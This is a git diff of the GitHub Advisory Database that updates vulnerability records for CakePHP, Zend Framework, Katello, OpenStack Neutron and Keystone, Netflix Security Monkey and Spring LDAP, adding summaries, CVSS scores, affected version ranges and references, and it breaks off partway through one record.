advisories/unreviewed/2024/04/GHSA-wfx2-88mh-r97m/GHSA-wfx2-88mh-r97m.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wg24-v48r-f3mm/GHSA-wg24-v48r-f3mm.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wgrq-q2w8-p9x4/GHSA-wgrq-q2w8-p9x4.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wh4m-6rh3-p4rq/GHSA-wh4m-6rh3-p4rq.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wh8c-8787-2j2f/GHSA-wh8c-8787-2j2f.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wj9q-7qxv-7f57/GHSA-wj9q-7qxv-7f57.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wjmr-v62x-4f45/GHSA-wjmr-v62x-4f45.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wm52-4cc3-xxgg/GHSA-wm52-4cc3-xxgg.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wmx4-3g32-fg7m/GHSA-wmx4-3g32-fg7m.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wp5p-62cp-gpq5/GHSA-wp5p-62cp-gpq5.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wpf2-cf85-jvfv/GHSA-wpf2-cf85-jvfv.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wprh-m7mq-qhfq/GHSA-wprh-m7mq-qhfq.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wpv3-6qr5-9rmx/GHSA-wpv3-6qr5-9rmx.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wq6m-mcm5-qhcj/GHSA-wq6m-mcm5-qhcj.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wqv6-gf55-v5gj/GHSA-wqv6-gf55-v5gj.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wvjq-4p9q-4q7p/GHSA-wvjq-4p9q-4q7p.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wvqc-rrc5-mp8p/GHSA-wvqc-rrc5-mp8p.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wvrc-7835-9grj/GHSA-wvrc-7835-9grj.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wvxc-855f-jvrv/GHSA-wvxc-855f-jvrv.json create mode 100644 advisories/unreviewed/2024/04/GHSA-ww88-jw5q-2479/GHSA-ww88-jw5q-2479.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wx98-g485-pgfr/GHSA-wx98-g485-pgfr.json create mode 100644 advisories/unreviewed/2024/04/GHSA-wxvv-7x57-mjgj/GHSA-wxvv-7x57-mjgj.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x237-rgmj-6rg4/GHSA-x237-rgmj-6rg4.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x246-w3fc-9p6h/GHSA-x246-w3fc-9p6h.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x2m4-5rqp-rhvq/GHSA-x2m4-5rqp-rhvq.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x498-p429-582w/GHSA-x498-p429-582w.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x57p-235m-crc8/GHSA-x57p-235m-crc8.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x5g3-vjqh-jg6c/GHSA-x5g3-vjqh-jg6c.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x67v-qcqh-2rvg/GHSA-x67v-qcqh-2rvg.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x6h6-66j7-3gwr/GHSA-x6h6-66j7-3gwr.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x6hw-w2wh-qw7c/GHSA-x6hw-w2wh-qw7c.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x6pg-hxcx-rghj/GHSA-x6pg-hxcx-rghj.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x723-q7ww-gm79/GHSA-x723-q7ww-gm79.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x767-6775-vv77/GHSA-x767-6775-vv77.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x866-v2pc-mx93/GHSA-x866-v2pc-mx93.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x8m6-m5rq-285x/GHSA-x8m6-m5rq-285x.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x8rm-m93r-jqp2/GHSA-x8rm-m93r-jqp2.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x8rv-vr65-phwh/GHSA-x8rv-vr65-phwh.json create mode 100644 advisories/unreviewed/2024/04/GHSA-x9g4-2m6v-c5cx/GHSA-x9g4-2m6v-c5cx.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xcx5-wxfr-wq9r/GHSA-xcx5-wxfr-wq9r.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xcxv-67v8-jc88/GHSA-xcxv-67v8-jc88.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xg42-vmfr-25f3/GHSA-xg42-vmfr-25f3.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xgm2-9pcq-75hg/GHSA-xgm2-9pcq-75hg.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xgv9-xhqv-rqvg/GHSA-xgv9-xhqv-rqvg.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xhgx-7r6h-x8hf/GHSA-xhgx-7r6h-x8hf.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xhh7-pjwc-jm9m/GHSA-xhh7-pjwc-jm9m.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xj3v-fcjw-gv7p/GHSA-xj3v-fcjw-gv7p.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xjcx-58p2-6mm5/GHSA-xjcx-58p2-6mm5.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xjj5-mp7v-39hq/GHSA-xjj5-mp7v-39hq.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xjx3-j32m-446r/GHSA-xjx3-j32m-446r.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xp2j-75cr-2mjj/GHSA-xp2j-75cr-2mjj.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xqjq-j9cx-q953/GHSA-xqjq-j9cx-q953.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xr98-c22v-cfcg/GHSA-xr98-c22v-cfcg.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xwrr-gvqm-j58v/GHSA-xwrr-gvqm-j58v.json create mode 100644 advisories/unreviewed/2024/04/GHSA-xx2r-2w7h-qwpc/GHSA-xx2r-2w7h-qwpc.json diff --git a/advisories/github-reviewed/2022/05/GHSA-5964-pq8r-4q62/GHSA-5964-pq8r-4q62.json b/advisories/github-reviewed/2022/05/GHSA-5964-pq8r-4q62/GHSA-5964-pq8r-4q62.json index 452425b617d..6a20a9c0a96 100644 --- a/advisories/github-reviewed/2022/05/GHSA-5964-pq8r-4q62/GHSA-5964-pq8r-4q62.json +++ b/advisories/github-reviewed/2022/05/GHSA-5964-pq8r-4q62/GHSA-5964-pq8r-4q62.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5964-pq8r-4q62", - "modified": "2023-01-14T05:30:14Z", + "modified": "2024-04-09T14:17:43Z", "published": "2022-05-17T05:07:14Z", "aliases": [ "CVE-2012-4399" @@ -9,7 +9,10 @@ "summary": "CakePHPallows remote attackers to read arbitrary files via XML data containing external entity references", "details": "The Xml class in CakePHP 2.1.x before 2.1.5 and 2.2.x before 2.2.1 allows remote attackers to read arbitrary files via XML data containing external entity references, aka an XML external entity (XXE) injection attack.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ { @@ -91,9 +94,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-611" ], - "severity": "MODERATE", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2023-01-14T05:30:14Z", "nvd_published_at": "2012-10-09T23:55:00Z" diff --git a/advisories/github-reviewed/2022/05/GHSA-5xv2-q475-rwrh/GHSA-5xv2-q475-rwrh.json b/advisories/github-reviewed/2022/05/GHSA-5xv2-q475-rwrh/GHSA-5xv2-q475-rwrh.json new file mode 100644 index 00000000000..5044b9ee312 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-5xv2-q475-rwrh/GHSA-5xv2-q475-rwrh.json @@ -0,0 +1,78 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5xv2-q475-rwrh", + "modified": "2024-04-09T14:24:53Z", + "published": "2022-05-17T05:13:13Z", + "aliases": [ + "CVE-2012-3503" + ], + "summary": "Katello uses hard coded credential", + "details": "The installation script in Katello 1.0 and earlier does not properly generate the `Application.config.secret_token` value, which causes each default installation to have the same secret token, and allows remote attackers to authenticate to the CloudForms System Engine web interface as an arbitrary user by creating a cookie using the default `secret_token`.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "RubyGems", + "name": "katello" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-3503" + }, + { + "type": "WEB", + "url": "https://github.com/Katello/katello/pull/499" + }, + { + "type": "WEB", + "url": "https://github.com/Katello/katello/commit/7c256fef9d75029d0ffff58ff1dcda915056d3a3" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Katello/katello" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20140806122239/http://secunia.com/advisories/50344" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200229120740/http://www.securityfocus.com/bid/55140" + }, + { + "type": "WEB", + "url": "http://rhn.redhat.com/errata/RHSA-2012-1186.html" + }, + { + "type": "WEB", + "url": "http://rhn.redhat.com/errata/RHSA-2012-1187.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-04-09T14:24:53Z", + "nvd_published_at": "2012-08-25T10:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6mmf-v5q7-vw2w/GHSA-6mmf-v5q7-vw2w.json b/advisories/github-reviewed/2022/05/GHSA-6mmf-v5q7-vw2w/GHSA-6mmf-v5q7-vw2w.json new file mode 100644 index 00000000000..6663ca11dda --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6mmf-v5q7-vw2w/GHSA-6mmf-v5q7-vw2w.json @@ -0,0 +1,70 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6mmf-v5q7-vw2w", + "modified": "2024-04-08T18:51:18Z", + "published": "2022-05-24T19:21:10Z", + "aliases": [ + "CVE-2021-44144" + ], + "summary": "Asterix Heap-based Buffer Overflow", + "details": "Croatia Control Asterix 2.8.1 has a heap-based buffer over-read, with additional details to be disclosed at a later date.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "asterix_decoder" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.7.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44144" + }, + { + "type": "WEB", + "url": "https://github.com/CroatiaControlLtd/asterix/issues/183" + }, + { + "type": "WEB", + "url": "https://github.com/CroatiaControlLtd/asterix/commit/3f765d387d239ccc44e278a2ffa600fb6a6587f9" + }, + { + "type": "PACKAGE", + "url": "https://github.com/CroatiaControlLtd/asterix" + }, + { + "type": "WEB", + "url": "https://github.com/CroatiaControlLtd/asterix/blob/daf33de522d1cdab0e941c025b89e18a0d4d42c6/README.md?plain=1#L7" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20221207104133/https://huntr.dev/bounties/1-other-CroatiaControlLtd/asterix" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T18:51:18Z", + "nvd_published_at": "2021-11-22T21:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-7pg4-5233-82jv/GHSA-7pg4-5233-82jv.json b/advisories/github-reviewed/2022/05/GHSA-7pg4-5233-82jv/GHSA-7pg4-5233-82jv.json index 5bedf0ea838..56f8f3f15c5 100644 --- a/advisories/github-reviewed/2022/05/GHSA-7pg4-5233-82jv/GHSA-7pg4-5233-82jv.json +++ b/advisories/github-reviewed/2022/05/GHSA-7pg4-5233-82jv/GHSA-7pg4-5233-82jv.json @@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-7pg4-5233-82jv", - "modified": "2024-01-12T18:22:11Z", + "modified": "2024-04-09T14:07:57Z", "published": "2022-05-17T04:56:50Z", "aliases": [ "CVE-2012-3363" ], "summary": "Zend Framework XXE Vulnerability", - "details": "`Zend_XmlRpc` in Zend Framework 1.x before 1.11.12 and 1.12.x before 1.12.0 does not properly handle SimpleXMLElement classes, which allows remote attackers to read arbitrary files or create TCP connections via an external entity reference in a DOCTYPE element in an XML-RPC request, aka an XML external entity (XXE) injection attack.", + "details": "`Zend_XmlRpc` in Zend Framework 1.x before 1.11.12 and 1.12.x before 1.12.0 does not properly handle `SimpleXMLElement` classes, which allows remote attackers to read arbitrary files or create TCP connections via an external entity reference in a DOCTYPE element in an XML-RPC request, aka an XML external entity (XXE) injection attack.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } ], "affected": [ { @@ -22,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.0" + "introduced": "1.0.0" }, { "fixed": "1.11.12" @@ -111,13 +114,17 @@ { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2012/06/27/2" + }, + { + "type": "WEB", + "url": "http://www.securitytracker.com/id?1027208" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], - "severity": "MODERATE", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-01-12T18:22:11Z", "nvd_published_at": "2013-02-13T17:55:00Z" diff --git a/advisories/unreviewed/2022/05/GHSA-8q95-jj7p-x93x/GHSA-8q95-jj7p-x93x.json b/advisories/github-reviewed/2022/05/GHSA-8q95-jj7p-x93x/GHSA-8q95-jj7p-x93x.json similarity index 53% rename from advisories/unreviewed/2022/05/GHSA-8q95-jj7p-x93x/GHSA-8q95-jj7p-x93x.json rename to advisories/github-reviewed/2022/05/GHSA-8q95-jj7p-x93x/GHSA-8q95-jj7p-x93x.json index a4ee002b6cf..1f312d5ebc7 100644 --- a/advisories/unreviewed/2022/05/GHSA-8q95-jj7p-x93x/GHSA-8q95-jj7p-x93x.json +++ b/advisories/github-reviewed/2022/05/GHSA-8q95-jj7p-x93x/GHSA-8q95-jj7p-x93x.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-8q95-jj7p-x93x", - "modified": "2022-05-13T01:34:31Z", + "modified": "2024-04-08T18:57:43Z", "published": "2022-05-13T01:34:31Z", "aliases": [ "CVE-2018-14636" ], + "summary": "Openstack Neutron vulnerable to eavesdropping on private traffic", "details": "Live-migrated instances are briefly able to inspect traffic for other instances on the same hypervisor. This brief window could be extended indefinitely if the instance's port is set administratively down prior to live-migration and kept down after the migration is complete. This is possible due to the Open vSwitch integration bridge being connected to the instance during migration. When connected to the integration bridge, all traffic for instances using the same Open vSwitch instance would potentially be visible to the migrated guest, as the required Open vSwitch VLAN filters are only applied post-migration. Versions of openstack-neutron before 13.0.0.0b2, 12.0.3, 11.0.5 are vulnerable.", "severity": [ { @@ -14,7 +15,66 @@ } ], "affected": [ - + { + "package": { + "ecosystem": "PyPI", + "name": "neutron" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "13.0.0.0b1" + }, + { + "fixed": "13.0.0.0b2" + } + ] + } + ], + "versions": [ + "13.0.0.0b1" + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "neutron" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "12.0.0" + }, + { + "fixed": "12.0.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "neutron" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.0.5" + } + ] + } + ] + } ], "references": [ { @@ -32,6 +92,10 @@ { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-14636" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openstack/neutron" } ], "database_specific": { @@ -39,8 +103,8 @@ ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T18:57:43Z", "nvd_published_at": "2018-09-10T19:29:00Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-9773-3fqg-8w25/GHSA-9773-3fqg-8w25.json b/advisories/github-reviewed/2022/05/GHSA-9773-3fqg-8w25/GHSA-9773-3fqg-8w25.json similarity index 53% rename from advisories/unreviewed/2022/05/GHSA-9773-3fqg-8w25/GHSA-9773-3fqg-8w25.json rename to advisories/github-reviewed/2022/05/GHSA-9773-3fqg-8w25/GHSA-9773-3fqg-8w25.json index ba508945a09..0e15bc792cb 100644 --- a/advisories/unreviewed/2022/05/GHSA-9773-3fqg-8w25/GHSA-9773-3fqg-8w25.json +++ b/advisories/github-reviewed/2022/05/GHSA-9773-3fqg-8w25/GHSA-9773-3fqg-8w25.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-9773-3fqg-8w25", - "modified": "2022-05-13T01:07:34Z", + "modified": "2024-04-08T18:55:25Z", "published": "2022-05-13T01:07:34Z", "aliases": [ "CVE-2019-9735" ], + "summary": "OpenStack Neutron's unsupported dport option prevents applying security groups", "details": "An issue was discovered in the iptables firewall module in OpenStack Neutron before 10.0.8, 11.x before 11.0.7, 12.x before 12.0.6, and 13.x before 13.0.3. By setting a destination port in a security group rule along with a protocol that doesn't support that option (for example, VRRP), an authenticated user may block further application of security group rules for instances from any project/tenant on the compute hosts to which it's applied. (Only deployments using the iptables security group driver are affected.)", "severity": [ { @@ -14,7 +15,82 @@ } ], "affected": [ - + { + "package": { + "ecosystem": "PyPI", + "name": "neutron" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "10.0.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "neutron" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.0.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "neutron" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "12.0.0" + }, + { + "fixed": "12.0.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "neutron" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "13.0.0" + }, + { + "fixed": "13.0.3" + } + ] + } + ] + } ], "references": [ { @@ -33,6 +109,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0935" }, + { + "type": "PACKAGE", + "url": "https://github.com/openstack/neutron" + }, { "type": "WEB", "url": "https://launchpad.net/bugs/1818385" @@ -49,6 +129,10 @@ "type": "WEB", "url": "https://usn.ubuntu.com/4036-1" }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20201208185619/http://www.securityfocus.com/bid/107390" + }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4409" @@ -56,10 +140,6 @@ { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2019/03/18/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107390" } ], "database_specific": { @@ -67,8 +147,8 @@ "CWE-755" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T18:55:25Z", "nvd_published_at": "2019-03-13T02:29:00Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-f889-wfwm-6p7m/GHSA-f889-wfwm-6p7m.json b/advisories/github-reviewed/2022/05/GHSA-f889-wfwm-6p7m/GHSA-f889-wfwm-6p7m.json similarity index 54% rename from advisories/unreviewed/2022/05/GHSA-f889-wfwm-6p7m/GHSA-f889-wfwm-6p7m.json rename to advisories/github-reviewed/2022/05/GHSA-f889-wfwm-6p7m/GHSA-f889-wfwm-6p7m.json index 81cbedc12d3..b876d51b529 100644 --- a/advisories/unreviewed/2022/05/GHSA-f889-wfwm-6p7m/GHSA-f889-wfwm-6p7m.json +++ b/advisories/github-reviewed/2022/05/GHSA-f889-wfwm-6p7m/GHSA-f889-wfwm-6p7m.json @@ -1,27 +1,58 @@ { "schema_version": "1.4.0", "id": "GHSA-f889-wfwm-6p7m", - "modified": "2022-05-17T04:50:52Z", + "modified": "2024-04-08T19:04:48Z", "published": "2022-05-17T04:50:52Z", "aliases": [ "CVE-2013-4477" ], + "summary": "OpenStack Identity Keystone Privilege Escalation vulnerability", "details": "The LDAP backend in OpenStack Identity (Keystone) Grizzly and Havana, when removing a role on a tenant for a user who does not have that role, adds the role to the user, which allows local users to gain privileges.", "severity": [ ], "affected": [ - + { + "package": { + "ecosystem": "PyPI", + "name": "keystone" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "8.0.0a0" + } + ] + } + ] + } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-4477" }, + { + "type": "WEB", + "url": "https://github.com/openstack/keystone/commit/b17e7bec768bd53d3977352486378698a3db3cfa" + }, + { + "type": "WEB", + "url": "https://github.com/openstack/keystone/commit/c6800ca1ac984c879e75826df6694d6199444ea0" + }, { "type": "WEB", "url": "https://bugs.launchpad.net/keystone/+bug/1242855" }, + { + "type": "PACKAGE", + "url": "https://github.com/openstack/keystone" + }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-0113.html" @@ -40,8 +71,8 @@ ], "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T19:04:48Z", "nvd_published_at": "2013-11-02T19:55:00Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-j6jq-3q8p-xgg6/GHSA-j6jq-3q8p-xgg6.json b/advisories/github-reviewed/2022/05/GHSA-j6jq-3q8p-xgg6/GHSA-j6jq-3q8p-xgg6.json similarity index 61% rename from advisories/unreviewed/2022/05/GHSA-j6jq-3q8p-xgg6/GHSA-j6jq-3q8p-xgg6.json rename to advisories/github-reviewed/2022/05/GHSA-j6jq-3q8p-xgg6/GHSA-j6jq-3q8p-xgg6.json index 509f4fa27a5..5a55c83f180 100644 --- a/advisories/unreviewed/2022/05/GHSA-j6jq-3q8p-xgg6/GHSA-j6jq-3q8p-xgg6.json +++ b/advisories/github-reviewed/2022/05/GHSA-j6jq-3q8p-xgg6/GHSA-j6jq-3q8p-xgg6.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-j6jq-3q8p-xgg6", - "modified": "2022-05-17T02:53:10Z", + "modified": "2024-04-08T19:00:08Z", "published": "2022-05-17T02:53:10Z", "aliases": [ "CVE-2017-7266" ], + "summary": "Netflix Security Monkey Open Redirect vulnerability", "details": "Netflix Security Monkey before 0.8.0 has an Open Redirect. The logout functionality accepted the \"next\" parameter which then redirects to any domain irrespective of the Host header.", "severity": [ { @@ -14,7 +15,25 @@ } ], "affected": [ - + { + "package": { + "ecosystem": "PyPI", + "name": "security_monkey" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.8.0" + } + ] + } + ] + } ], "references": [ { @@ -29,13 +48,17 @@ "type": "WEB", "url": "https://github.com/Netflix/security_monkey/commit/3b4da13efabb05970c80f464a50d3c1c12262466" }, + { + "type": "PACKAGE", + "url": "https://github.com/Netflix/security_monkey" + }, { "type": "WEB", "url": "https://github.com/Netflix/security_monkey/releases/tag/v0.8.0" }, { "type": "WEB", - "url": "http://www.securityfocus.com/bid/97088" + "url": "https://web.archive.org/web/20201220170714/http://www.securityfocus.com/bid/97088" } ], "database_specific": { @@ -43,8 +66,8 @@ "CWE-601" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T19:00:08Z", "nvd_published_at": "2017-03-26T05:59:00Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-jr9m-v5qh-mh2j/GHSA-jr9m-v5qh-mh2j.json b/advisories/github-reviewed/2022/05/GHSA-jr9m-v5qh-mh2j/GHSA-jr9m-v5qh-mh2j.json similarity index 54% rename from advisories/unreviewed/2022/05/GHSA-jr9m-v5qh-mh2j/GHSA-jr9m-v5qh-mh2j.json rename to advisories/github-reviewed/2022/05/GHSA-jr9m-v5qh-mh2j/GHSA-jr9m-v5qh-mh2j.json index 0568724e040..e47d2d58125 100644 --- a/advisories/unreviewed/2022/05/GHSA-jr9m-v5qh-mh2j/GHSA-jr9m-v5qh-mh2j.json +++ b/advisories/github-reviewed/2022/05/GHSA-jr9m-v5qh-mh2j/GHSA-jr9m-v5qh-mh2j.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-jr9m-v5qh-mh2j", - "modified": "2022-05-13T01:07:34Z", + "modified": "2024-04-08T18:54:13Z", "published": "2022-05-13T01:07:34Z", "aliases": [ "CVE-2019-10876" ], + "summary": "OpenStack Neutron overlapping security group rules prevents compute node network configuration", "details": "An issue was discovered in OpenStack Neutron 11.x before 11.0.7, 12.x before 12.0.6, and 13.x before 13.0.3. By creating two security groups with separate/overlapping port ranges, an authenticated user may prevent Neutron from being able to configure networks on any compute nodes where those security groups are present, because of an Open vSwitch (OVS) firewall KeyError. All Neutron deployments utilizing neutron-openvswitch-agent are affected.", "severity": [ { @@ -14,7 +15,63 @@ } ], "affected": [ - + { + "package": { + "ecosystem": "PyPI", + "name": "neutron" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.0.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "neutron" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "12.0.0" + }, + { + "fixed": "12.0.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "neutron" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "13.0.0" + }, + { + "fixed": "13.0.3" + } + ] + } + ] + } ], "references": [ { @@ -33,6 +90,10 @@ "type": "WEB", "url": "https://bugs.launchpad.net/ossa/+bug/1813007" }, + { + "type": "PACKAGE", + "url": "https://github.com/openstack/neutron" + }, { "type": "WEB", "url": "https://review.openstack.org/#/q/topic:bug/1813007" @@ -51,8 +112,8 @@ ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2024-04-08T18:54:13Z", "nvd_published_at": "2019-04-05T05:29:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-pjqh-2jcc-5j84/GHSA-pjqh-2jcc-5j84.json b/advisories/github-reviewed/2022/05/GHSA-pjqh-2jcc-5j84/GHSA-pjqh-2jcc-5j84.json index b0f01ca8c45..bbd708174f9 100644 --- a/advisories/github-reviewed/2022/05/GHSA-pjqh-2jcc-5j84/GHSA-pjqh-2jcc-5j84.json +++ b/advisories/github-reviewed/2022/05/GHSA-pjqh-2jcc-5j84/GHSA-pjqh-2jcc-5j84.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pjqh-2jcc-5j84", - "modified": "2022-06-30T21:14:06Z", + "modified": "2024-04-05T18:51:08Z", "published": "2022-05-13T01:12:09Z", "aliases": [ "CVE-2017-8028" @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework.amqp:spring-amqp" + "name": "org.springframework.ldap:spring-ldap-core" }, "ranges": [ { @@ -43,10 +43,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-8028" }, + { + "type": "WEB", + "url": "https://github.com/spring-projects/spring-ldap/commit/08e8ae289bbd1b581986c7238604a147119c1336" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0319" }, + { + "type": "PACKAGE", + "url": "https://github.com/spring-projects/spring-ldap" + }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2017/11/msg00026.html" diff --git a/advisories/unreviewed/2022/05/GHSA-x634-34m9-96mp/GHSA-x634-34m9-96mp.json b/advisories/github-reviewed/2022/05/GHSA-x634-34m9-96mp/GHSA-x634-34m9-96mp.json similarity index 54% rename from advisories/unreviewed/2022/05/GHSA-x634-34m9-96mp/GHSA-x634-34m9-96mp.json rename to advisories/github-reviewed/2022/05/GHSA-x634-34m9-96mp/GHSA-x634-34m9-96mp.json index 0e8e1217df3..ed08ebc1aa6 100644 --- a/advisories/unreviewed/2022/05/GHSA-x634-34m9-96mp/GHSA-x634-34m9-96mp.json +++ b/advisories/github-reviewed/2022/05/GHSA-x634-34m9-96mp/GHSA-x634-34m9-96mp.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": 